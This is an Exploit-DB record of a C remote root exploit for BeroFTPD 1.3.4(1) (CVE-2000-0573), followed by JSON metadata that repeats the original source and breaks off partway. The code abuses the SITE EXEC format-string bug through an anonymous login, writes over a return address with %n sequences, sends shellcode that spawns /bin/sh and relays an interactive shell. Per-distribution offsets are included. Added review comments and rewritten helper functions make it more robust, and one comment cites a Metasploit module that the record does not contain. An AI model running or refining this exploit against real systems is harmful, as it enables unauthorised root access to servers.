ID EDB-ID:269 Type exploitdb Reporter qitest1 Modified 2001-05-08T00:00:00
Description
BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit. CVE-2000-0573. Remote exploit for the Linux platform.
/*
* BeroFTPD 1.3.4(1) Linux x86 remote root exploit
* by qitest1 - 5/05/2001
*
* BeroFTPD is an ftpd derived from wuftpd sources. This code
* exploits the format bug of the site exec cmd, well known to be
* present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1)
* is the current version at the moment.
*
* JUST SAMPLE CODE. For different platforms you have to try with
* different offsets for different retaddrs. You see.. =)
*
* Greets: Nail, Norby, Berserker.
* 69 rulez.. ;P
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <getopt.h>
#include <netdb.h>
#include <netinet/in.h>
#include <strings.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * One row of the target table: the per-distribution constants the
 * address arithmetic in main() and fmtstr_build() plugs in.
 */
struct targ
{
int def;                  /* selector given with -t; 69 marks the end of the table */
char *descr;              /* human-readable name printed by usage() and main() */
unsigned long int enbuf;  /* added to the leaked stack address to form bufaddr (main) */
int dawlen;               /* subtracted from the initial write count in fmtstr_build */
};
/*
 * Author-supplied per-target constants.  The final {69, NULL, 0, 0}
 * row is the sentinel usage() stops on; nothing else validates that a
 * -t value stays inside the table.
 */
struct targ target[]=
{
{0, "RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz", 0xded, 6},
{1, "Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz", 0x1170, 12},
{2, "Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm", 0xdf1, 6},
{69, NULL, 0, 0}
};
/* 15 byte x86/linux PIC read() shellcode by lorian / teso
 *
 * The array itself holds 16 bytes: 0xff appears twice in the last
 * group, the same doubling xpad_cat() applies to address bytes
 * (presumably because the FTP control connection treats 0xff
 * specially -- the Metasploit module quoted further down in this
 * record notes the same requirement; confirm).  The 0x00 inside the
 * push immediate (byte index 8, the "xx" in the comment) is a
 * placeholder: strlen(shellcode_read) stops there until main()
 * overwrites it with strlen(shellcode).
 */
unsigned char shellcode_read[] =
"\x33\xdb" /* xorl %ebx, %ebx */
"\xf7\xe3" /* mull %ebx */
"\xb0\x03" /* movb $3, %al */
"\x8b\xcc" /* movl %esp, %ecx */
"\x68\xb2\x00\xcd\x80" /* push 0x80CDxxB2 -- the 0x00 ("xx") is patched by main() */
"\xff\xff\xe4"; /* jmp %esp (0xff written twice, see xpad_cat) */
/*
 * Payload bytes as supplied by the author ("Lam3rZ code"); not decoded
 * here.  main() stores strlen(shellcode) into the placeholder byte of
 * shellcode_read and sends this array on the control connection after
 * the format string has been sent.
 */
unsigned char shellcode[] = /* Lam3rZ code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
"\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b"
"\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66"
"\xb9\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89"
"\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0"
"\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08"
"\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0"
"\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8"
"\x90\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
/* Shared state between main() and the helpers below. */
char fmtstr[1024];          /* the SITE EXEC line assembled by fmtstr_build(); static storage, so zeroed at start, then only appended to with strcat */
int sock;                   /* control connection returned by conn2host() */
int sel;                    /* target[] index from -t (never range-checked) */
int offset;                 /* user adjustment added to bufaddr, from -o */
unsigned long int retloc;   /* address written to by the %n sequence; leaked value minus 0x40 (retloc_find) */
unsigned long int bufaddr;  /* value the %n writes deposit at retloc: tmpaddr + target[sel].enbuf + offset */
unsigned long int tmpaddr;  /* raw %p value leaked by retloc_find() */
/* Forward declarations for the functions defined below main(). */
void fmtstr_build(unsigned long int bufaddr, unsigned long int retloc);
void xpad_cat (unsigned char *fabuf, unsigned long int addr);
void retloc_find(void);
void shellami(int sock);
void login(void);
void usage(char *progname);
int conn2host(char *host, int port);
/*
 * Entry point.  Parses -h host, -t target index and -o offset, connects
 * to port 21, logs in anonymously, leaks a stack address through
 * retloc_find(), derives bufaddr from it, builds and sends the format
 * string, sends the payload and finally hands the socket to shellami().
 *
 * Pre-C99 implicit-int return type; no value is ever returned.
 * NOTE(review): sel comes straight from atoi() and is used to index
 * target[] below without being checked against the table's size.
 */
main(int argc, char *argv[])
{
char rbuf[1024];
char *host = NULL;
int cnt;
printf("\n BeroFTPD 1.3.4(1) exploit by qitest1\n\n");
if(argc == 1)
usage(argv[0]);
while((cnt = getopt(argc,argv,"h:t:o:")) != EOF)
{
switch(cnt)
{
case 'h':
host = strdup(optarg);
break;
case 't':
sel = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL)
usage(argv[0]);
printf("+Host: %s\n as: %s\n", host, target[sel].descr);
printf("+Connecting to %s...\n", host);
sock = conn2host(host, 21);
printf(" connected\n");
printf("+Receiving banner...\n");
/* NOTE(review): the recv() length is ignored and rbuf is neither zeroed
 * nor NUL-terminated before it is printed with "%s". */
recv(sock, rbuf, 1024, 0);
printf("%s", rbuf);
memset(rbuf, 0, 1024);
printf(" received\n");
printf("+Logging in...\n");
login();
printf(" logged in\n");
printf("+Searching retloc...\n");
/* retloc_find() sets both retloc and tmpaddr from the same leaked value. */
retloc_find();
/* "%p" is given an unsigned long here and below -- a format/argument
 * type mismatch. */
printf(" found: %p\n", retloc);
printf("+Searching bufaddr...\n");
/* bufaddr = leaked address + per-target enbuf + the user's -o offset. */
bufaddr = tmpaddr + target[sel].enbuf;
printf(" found: %p + offset = ", bufaddr);
bufaddr += offset;
printf("%p\n", bufaddr);
printf("+Preparing shellcode...\n");
/* strlen(shellcode_read) stops at the 0x00 placeholder inside the push
 * immediate; that byte is replaced with the length of the payload sent
 * further down.  Must happen before fmtstr_build() measures the array. */
shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);
printf(" shellcode ready\n");
printf("+Building fmtstr...\n");
fmtstr_build(bufaddr, retloc);
printf(" fmtstr builded\n");
printf("+Sending fmtstr...\n");
send(sock, fmtstr, strlen(fmtstr), 0);
printf(" fmtstr sent\n");
/* Reply is read into rbuf but never inspected; length unchecked. */
recv(sock, rbuf, 1024, 0);
sleep(1);
/* The payload goes out as a separate send after a one-second pause. */
send(sock, shellcode, strlen(shellcode), 0);
sleep(2);
printf("+Entering love mode...\n"); /* Nail teachs.. ;-) */
shellami(sock);
}
/*
 * Appends the "SITE EXEC" line to the global fmtstr (strcat throughout;
 * the buffer is never cleared here).
 *
 * Layout, in order: "SITE EXEC " and a space; the four write targets
 * retloc..retloc+3 separated by the 0x69696969 filler; 136 "%.f"
 * conversions; one "%x"; four "%<width>d%n" pairs; 0x90 padding up to
 * 510 bytes; shellcode_read; a newline.
 *
 * bufaddr: value whose little-endian byte k the k-th %n deposits at
 *          retloc + k.
 * retloc:  address of the first byte written.
 *
 * NOTE(review): strlen(shellcode_read) below only measures the whole
 * array if main() has already replaced its 0x00 placeholder byte.
 * strcat()/strlen() are also passed the unsigned char array where
 * char * is expected (pointer-sign mismatch), and sprintf() writes
 * into fmtstr without a bound.
 */
void
fmtstr_build(unsigned long int bufaddr, unsigned long int retloc)
{
int i;
int eat = 136;    /* number of "%.f" conversions emitted */
int wlen = 428;   /* running count of characters assumed output before each %n */
int tow;          /* field width of the next %d */
int freespz;      /* number of 0x90 bytes needed to reach 510 bytes */
char f[1024];
unsigned long int soul69 = 0x69696969; /* That's amore.. =) -- filler between the address slots */
unsigned char retaddr[4];
/* Little-endian bytes of bufaddr. */
for(i = 0; i < 4; ++i)
retaddr[i] = (bufaddr >> (i << 3)) & 0xff;
/* Per-target correction of the starting count; presumably the length
 * of reply text the daemon prints ahead of this string -- confirm. */
wlen -= target[sel].dawlen;
f[0] = 0;
/* "%.f" repeated eat times; presumably advances the daemon's argument
 * pointer past the stack area between the args and the addresses
 * placed above -- confirm. */
for(i = 0; i < eat; i++)
strcat(f, "%.f");
strcat(fmtstr, "SITE EXEC ");
strcat(fmtstr, " ");
/* Raw address bytes via xpad_cat(), which writes any 0xff twice. */
xpad_cat(fmtstr, retloc);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 1);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 2);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 3);
strcat(fmtstr, f);
strcat(fmtstr, "%x");
/* Code by teso
 * Each step chooses a %d width so that the running count's low byte
 * equals retaddr[k] when the following %n fires.  Widths below 10 get
 * 0x100 added, which leaves the low byte unchanged.
 */
tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
/* End here
 */
/* Pad with 0x90 so the line is 510 bytes including the trailing
 * newline.  size_t/int mix: if fmtstr is already longer, the
 * subtraction wraps before being stored in freespz. */
freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;
for(i = 0; i < freespz ; i++)
strcat(fmtstr, "\x90");
strcat(fmtstr, shellcode_read);
strcat(fmtstr, "\n");
}
/* Code by teso
*/
/*
 * Appends the four bytes of addr, least significant first, to the
 * NUL-terminated string in fabuf.  A 0xff byte is written twice
 * (consecutively); every other byte once.  The buffer must have room
 * for up to eight more bytes plus the terminator.
 *
 * A zero byte in addr terminates the string early, exactly as the
 * original sprintf("%c") did; the following iteration then overwrites
 * that NUL.
 */
void xpad_cat (unsigned char *fabuf, unsigned long int addr)
{
	char *dst = (char *) fabuf;
	unsigned shift;

	for (shift = 0; shift < 32; shift += 8) {
		unsigned char byte = (unsigned char) (addr >> shift);
		size_t tail = strlen(dst);

		dst[tail++] = (char) byte;
		if (byte == 0xff)
			dst[tail++] = (char) byte;
		dst[tail] = '\0';
	}
}
/* End here
*/
/*
 * Sends "SITE EXEC %p %p %p %p %p %p \n" on the global socket and
 * parses the sixth %p value of the reply into both retloc and tmpaddr;
 * retloc is then lowered by 0x40.
 *
 * NOTE(review): the recv() length is ignored and rbuf is neither zeroed
 * nor NUL-terminated, so the token walk and the strlen() calls operate
 * on whatever the 1024-byte read left behind; the while loop has no
 * bound.  "%p" into an unsigned long * is a type mismatch (sscanf
 * expects void **).
 */
void
retloc_find(void)
{
int i;
char rbuf[1024];
char sbuf[1024];
char *ptr;
strcpy(sbuf, "SITE EXEC ");
for(i = 0; i < 6; i++)
strcat(sbuf, "%p ");
strcat(sbuf, "\n");
send(sock, sbuf, strlen(sbuf), 0);
recv(sock, rbuf, 1024, 0);
ptr = rbuf;
/* Skip five space-separated tokens so ptr points at the sixth value. */
for(i = 0; i < 5; i++)
{
while(*ptr != ' ')
ptr++;
ptr++;
}
/* Removes the last three characters in total: the second strlen()
 * already sees the NUL placed by the first.  Presumably the trailing
 * space, CR and LF of the reply line -- confirm. */
ptr[strlen(ptr) - 2] = '\x00';
ptr[strlen(ptr) - 1] = '\x00';
sscanf(ptr, "%p", &retloc);
sscanf(ptr, "%p", &tmpaddr);
retloc -= 0x40;
}
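/*
 * Interactive relay between the terminal and sock: sends the initial
 * command, then forwards socket data to stdout and stdin data to the
 * socket until the peer closes the connection (exit(0)).
 *
 * Fixes relative to the original: reads are limited to
 * sizeof recvbuf - 1 so the terminating NUL stored at recvbuf[n] stays
 * inside the array (reading 1024 bytes into a 1024-byte buffer wrote
 * one past its end); socket output is written with fwrite() so embedded
 * zero bytes do not truncate it; select()/write() failures are reported
 * instead of ignored.
 *
 * sock: connected descriptor to relay; never closed here.
 */
void
shellami(int sock)
{
	ssize_t n;
	char recvbuf[1024];
	char *cmd = "id; uname -a\n";
	fd_set rset;

	send(sock, cmd, strlen(cmd), 0);

	for (;;) {
		FD_ZERO(&rset);
		FD_SET(sock, &rset);
		FD_SET(STDIN_FILENO, &rset);
		if (select(sock + 1, &rset, NULL, NULL, NULL) < 0) {
			if (errno == EINTR)
				continue;
			perror("select");
			exit(1);
		}
		if (FD_ISSET(sock, &rset)) {
			/* One byte is reserved for the NUL terminator. */
			n = read(sock, recvbuf, sizeof recvbuf - 1);
			if (n <= 0) {
				printf("Connection closed by foreign host.\n");
				exit(0);
			}
			recvbuf[n] = 0;
			fwrite(recvbuf, 1, (size_t) n, stdout);
			fflush(stdout);
		}
		if (FD_ISSET(STDIN_FILENO, &rset)) {
			n = read(STDIN_FILENO, recvbuf, sizeof recvbuf - 1);
			if (n > 0 && write(sock, recvbuf, (size_t) n) < 0) {
				perror("write");
				exit(1);
			}
		}
	}
}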
/*
 * Resolve host, open a TCP socket and connect it to port.  Each failure
 * is reported (herror/perror) and terminates the process with exit(1).
 *
 * host: name or dotted address handed to gethostbyname().
 * port: TCP port in host byte order.
 * Returns the connected descriptor; the caller owns it.
 */
int
conn2host(char *host, int port)
{
	struct sockaddr_in peer;
	struct hostent *ent = gethostbyname(host);
	int fd;

	if (ent == NULL) {
		herror("gethostbyname");
		exit(1);
	}

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if (fd == -1) {
		perror("socket");
		exit(1);
	}

	memset(&peer, 0, sizeof peer);
	peer.sin_family = AF_INET;
	peer.sin_port = htons(port);
	memcpy(&peer.sin_addr, ent->h_addr, sizeof peer.sin_addr);

	if (connect(fd, (struct sockaddr *) &peer, sizeof peer) == -1) {
		perror("connect");
		exit(1);
	}

	return fd;
}
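/*
 * Zero buf, read one reply from the global socket into it (one byte is
 * kept for the NUL) and return the byte count.  A closed connection or
 * a recv() error is reported and terminates the process, instead of the
 * original behaviour of looping forever on an empty buffer.
 */
static ssize_t
login_reply(char *buf, size_t len)
{
	ssize_t n;

	memset(buf, 0, len);
	n = recv(sock, buf, len - 1, 0);
	if (n < 0) {
		perror("recv");
		exit(1);
	}
	if (n == 0) {
		printf("Connection closed by foreign host.\n");
		exit(1);
	}
	return n;
}

/*
 * Anonymous FTP login on the global socket: send USER, discard its
 * reply, send PASS and keep reading replies until one contains
 * "login ok".
 *
 * Every reply is read with login_reply(), so strstr() always sees a
 * NUL-terminated buffer (the original could fill all 1024 bytes with
 * no terminator) and a dropped connection exits rather than spinning.
 */
void
login(void)
{
	char *user = "USER anonymous\n";
	char *pass = "PASS guest@\n";
	char rbuf[1024];

	send(sock, user, strlen(user), 0);
	login_reply(rbuf, sizeof rbuf);
	/* The USER reply is not inspected; start PASS with a clean buffer. */
	memset(rbuf, 0, sizeof rbuf);
	send(sock, pass, strlen(pass), 0);
	while (strstr(rbuf, "login ok") == NULL)
		login_reply(rbuf, sizeof rbuf);
}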
/*
 * Print the command-line help and the target table to stdout, then
 * exit(1).  The table walk stops at the sentinel row whose def is 69.
 *
 * progname: argv[0], shown in the usage line.
 */
void
usage(char *progname)
{
	const struct targ *t;

	printf("Usage: %s [options]\n", progname);
	fputs("Options:\n"
	      " -h hostname\n"
	      " -t target\n"
	      " -o offset\n"
	      "Available targets:\n", stdout);
	for (t = target; t->def != 69; t++)
		printf(" %d) %s\n", t->def, t->descr);
	exit(1);
}
// milw0rm.com [2001-05-08]
{"id": "EDB-ID:269", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BeroFTPD 1.3.41 - Remote Root Exploit Linux x86", "description": "BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit. CVE-2000-0573. Remote exploit for linux platform", "published": "2001-05-08T00:00:00", "modified": "2001-05-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/269/", "reporter": "qitest1", "references": [], "cvelist": ["CVE-2000-0573"], "lastseen": "2016-01-31T12:03:33", "viewCount": 18, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2016-01-31T12:03:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0573"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84534"]}, {"type": "exploitdb", "idList": ["EDB-ID:16311", "EDB-ID:20031", "EDB-ID:201", "EDB-ID:20032", "EDB-ID:20030", "EDB-ID:239"]}, {"type": "nessus", "idList": ["WU_FTPD_SITE_EXEC.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:11805"]}, {"type": "canvas", "idList": ["WUFTPD_SEXEC"]}, {"type": "cert", "idList": ["VU:29823"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/FTP/WUFTPD_SITE_EXEC_FORMAT"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010452", "OPENVAS:10452"]}], "modified": "2016-01-31T12:03:33", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://www.exploit-db.com/download/269/", "sourceData": "/* \r\n * BeroFTPD 1.3.4(1) Linux x86 remote root exploit \r\n * by qitest1 - 5/05/2001\r\n *\r\n * BeroFTPD is an ftpd derived from wuftpd sources. This code\r\n * exploits the format bug of the site exec cmd, well known to be\r\n * present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1) \r\n * is the current version at the moment. \r\n * \r\n * JUST SAMPLE CODE. For different platforms you have to try with\r\n * different offsets for different retaddrs. You see.. 
=) \r\n *\r\n * Greets: Nail, Norby, Berserker.\r\n * 69 rulez.. ;P\r\n */\r\n\r\n#include <stdio.h> \r\n#include <stdlib.h> \r\n#include <getopt.h>\r\n#include <errno.h> \r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <netinet/in.h>\r\n\r\nstruct targ\r\n{\r\n int\t\t\tdef;\r\n char \t\t*descr;\r\n unsigned long int \tenbuf;\r\n int\t\t\tdawlen;\r\n};\r\n\r\nstruct targ target[]=\r\n {\t\t\t\r\n {0, \"RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz\", 0xded, 6},\r\n {1, \"Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz\", 0x1170, 12}, \r\n {2, \"Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm\", 0xdf1, 6}, \r\n {69, NULL, 0, 0}\r\n };\r\n\r\n /* 15 byte x86/linux PIC read() shellcode by lorian / teso\r\n */\r\nunsigned char shellcode_read[] =\r\n \"\\x33\\xdb\" /* xorl %ebx, %ebx */\r\n \"\\xf7\\xe3\" /* mull %ebx */\r\n \"\\xb0\\x03\" /* movb $3, %al */\r\n \"\\x8b\\xcc\" /* movl %esp, %ecx */\r\n \"\\x68\\xb2\\x00\\xcd\\x80\" /* push 0x80CDxxB2 */\r\n \"\\xff\\xff\\xe4\"; /* jmp %esp */\r\n\r\nunsigned char shellcode[] =\t/* Lam3rZ code */\r\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\"\r\n \"\\x31\\xdb\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\"\r\n \"\\x5e\\x31\\xc0\\x31\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\"\r\n \"\\xb9\\xff\\x01\\xb0\\x27\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\"\r\n \"\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x8d\\x5e\\x08\\x89\"\r\n \"\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\\x5e\\x08\\xb0\"\r\n \"\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\\x09\"\r\n \"\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\"\r\n \"\\xc8\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\"\r\n \"\\x89\\x46\\x0c\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\"\r\n \"\\x0b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\xe8\"\r\n \"\\x90\\xff\\xff\\xff\\x30\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\"\r\n \"\\x2e\\x2e\\x31\\x31\";\r\n\r\nchar \t\t 
\tfmtstr[1024];\r\nint\t\t\tsock;\r\nint\t\t\tsel;\r\nint\t\t\toffset;\r\nunsigned long int retloc;\r\nunsigned long int \tbufaddr;\r\nunsigned long int\ttmpaddr;\r\n\t\r\nvoid \t\tfmtstr_build(unsigned long int bufaddr, unsigned long int retloc);\r\nvoid \t\txpad_cat (unsigned char *fabuf, unsigned long int addr);\r\nvoid \t\tretloc_find(void);\r\nvoid \t\tshellami(int sock);\r\nvoid\t\tlogin(void);\r\nvoid\t\tusage(char *progname);\r\nint \t\tconn2host(char *host, int port);\r\n\r\nmain(int argc, char *argv[])\r\n{\r\nchar\t\trbuf[1024];\r\nchar\t\t*host = NULL;\r\nint \t\tcnt;\r\n\r\n printf(\"\\n BeroFTPD 1.3.4(1) exploit by qitest1\\n\\n\");\r\n if(argc == 1)\r\n\tusage(argv[0]);\r\n while((cnt = getopt(argc,argv,\"h:t:o:\")) != EOF)\r\n {\r\n switch(cnt)\r\n {\r\n case 'h':\r\n host = strdup(optarg);\r\n break;\r\n case 't':\r\n sel = atoi(optarg); \r\n break;\r\n case 'o':\r\n offset = atoi(optarg);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n\r\n if(host == NULL)\r\n\tusage(argv[0]);\r\n\r\n printf(\"+Host: %s\\n as: %s\\n\", host, target[sel].descr);\r\n\r\n printf(\"+Connecting to %s...\\n\", host);\r\n sock = conn2host(host, 21);\r\n printf(\" connected\\n\");\r\n\r\n printf(\"+Receiving banner...\\n\");\r\n recv(sock, rbuf, 1024, 0);\r\n printf(\"%s\", rbuf);\r\n memset(rbuf, 0, 1024);\r\n printf(\" received\\n\");\r\n\r\n printf(\"+Logging in...\\n\");\r\n login();\r\n printf(\" logged in\\n\");\r\n\r\n printf(\"+Searching retloc...\\n\");\r\n retloc_find();\r\n printf(\" found: %p\\n\", retloc);\r\n\r\n printf(\"+Searching bufaddr...\\n\");\r\n bufaddr = tmpaddr + target[sel].enbuf;\r\n printf(\" found: %p + offset = \", bufaddr);\r\n bufaddr += offset;\r\n printf(\"%p\\n\", bufaddr); \r\n\r\n printf(\"+Preparing shellcode...\\n\");\r\n shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);\r\n printf(\" shellcode ready\\n\");\r\n\r\n printf(\"+Building fmtstr...\\n\");\r\n fmtstr_build(bufaddr, 
retloc);\r\n printf(\" fmtstr builded\\n\"); \r\n \r\n printf(\"+Sending fmtstr...\\n\");\r\n send(sock, fmtstr, strlen(fmtstr), 0);\r\n printf(\" fmtstr sent\\n\");\r\n recv(sock, rbuf, 1024, 0);\r\n sleep(1);\r\n send(sock, shellcode, strlen(shellcode), 0);\r\n sleep(2);\r\n printf(\"+Entering love mode...\\n\"); /* Nail teachs.. ;-) */\r\n shellami(sock); \r\n\r\n}\r\n\r\nvoid\r\nfmtstr_build(unsigned long int bufaddr, unsigned long int retloc)\r\n{\r\nint i;\r\nint\t\t eat = 136;\r\nint wlen = 428;\r\nint tow;\r\nint freespz;\r\nchar\t\t f[1024];\r\nunsigned long int soul69 = 0x69696969; /* That's amore.. =) */\r\nunsigned char retaddr[4];\r\n\r\n for(i = 0; i < 4; ++i)\r\n\tretaddr[i] = (bufaddr >> (i << 3)) & 0xff;\r\n\r\n wlen -= target[sel].dawlen;\r\n f[0] = 0;\r\n for(i = 0; i < eat; i++)\r\n strcat(f, \"%.f\");\r\n\r\n strcat(fmtstr, \"SITE EXEC \");\r\n strcat(fmtstr, \" \");\r\n xpad_cat(fmtstr, retloc);\r\n xpad_cat(fmtstr, soul69);\r\n xpad_cat(fmtstr, retloc + 1);\r\n xpad_cat(fmtstr, soul69);\r\n xpad_cat(fmtstr, retloc + 2);\r\n xpad_cat(fmtstr, soul69);\r\n xpad_cat(fmtstr, retloc + 3);\r\n strcat(fmtstr, f);\r\n strcat(fmtstr, \"%x\");\r\n\r\n /* Code by teso\r\n */\r\n tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100; \r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n\r\n tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100;\r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n\r\n tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100;\r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n\r\n tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100;\r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n /* End here\r\n */\r\n\r\n freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;\r\n for(i = 0; i < 
freespz ; i++)\r\n\tstrcat(fmtstr, \"\\x90\");\r\n strcat(fmtstr, shellcode_read);\r\n\r\n strcat(fmtstr, \"\\n\");\r\n\r\n}\r\n\r\n /* Code by teso\r\n */\r\nvoid xpad_cat (unsigned char *fabuf, unsigned long int addr)\r\n{\r\n int i;\r\n unsigned char c;\r\n\r\n for (i = 0 ; i <= 3 ; ++i) {\r\n switch (i) {\r\n case (0):\r\n c = (unsigned char) ((addr & 0x000000ff) );\r\n break;\r\n case (1):\r\n c = (unsigned char) ((addr & 0x0000ff00) >> 8);\r\n break;\r\n case (2):\r\n c = (unsigned char) ((addr & 0x00ff0000) >> 16);\r\n break;\r\n case (3):\r\n c = (unsigned char) ((addr & 0xff000000) >> 24);\r\n break;\r\n }\r\n if (c == 0xff)\r\n sprintf (fabuf + strlen (fabuf), \"%c\", c);\r\n\r\n sprintf (fabuf + strlen (fabuf), \"%c\", c);\r\n }\r\n\r\n return;\r\n}\r\n /* End here\r\n */\r\n\r\nvoid\r\nretloc_find(void)\r\n{\r\nint\t\ti;\r\nchar\t\trbuf[1024];\r\nchar\t\tsbuf[1024];\r\nchar\t\t*ptr;\r\n\r\n strcpy(sbuf, \"SITE EXEC \");\r\n for(i = 0; i < 6; i++)\r\n\tstrcat(sbuf, \"%p \");\r\n strcat(sbuf, \"\\n\");\r\n send(sock, sbuf, strlen(sbuf), 0); \r\n\r\n recv(sock, rbuf, 1024, 0);\r\n ptr = rbuf;\r\n for(i = 0; i < 5; i++)\r\n\t{\r\n\t while(*ptr != ' ')\r\n\t \tptr++;\r\n\t ptr++;\r\n\t}\r\n ptr[strlen(ptr) - 2] = '\\x00';\t\r\n ptr[strlen(ptr) - 1] = '\\x00';\r\n sscanf(ptr, \"%p\", &retloc);\r\n sscanf(ptr, \"%p\", &tmpaddr);\r\n retloc -= 0x40;\r\n\r\n}\r\n\r\nvoid\r\nshellami(int sock)\r\n{\r\nint \t\tn;\r\nchar \t\trecvbuf[1024];\r\nchar\t\t*cmd = \"id; uname -a\\n\";\r\nfd_set \t\trset;\r\n\r\n send(sock, cmd, strlen(cmd), 0);\r\n\r\n while (1)\r\n {\r\n FD_ZERO(&rset);\r\n FD_SET(sock,&rset);\r\n FD_SET(STDIN_FILENO,&rset);\r\n select(sock+1,&rset,NULL,NULL,NULL);\r\n if (FD_ISSET(sock,&rset))\r\n {\r\n n=read(sock,recvbuf,1024);\r\n if (n <= 0)\r\n {\r\n printf(\"Connection closed by foreign host.\\n\");\r\n exit(0);\r\n }\r\n recvbuf[n]=0;\r\n printf(\"%s\",recvbuf);\r\n }\r\n if (FD_ISSET(STDIN_FILENO,&rset))\r\n {\r\n 
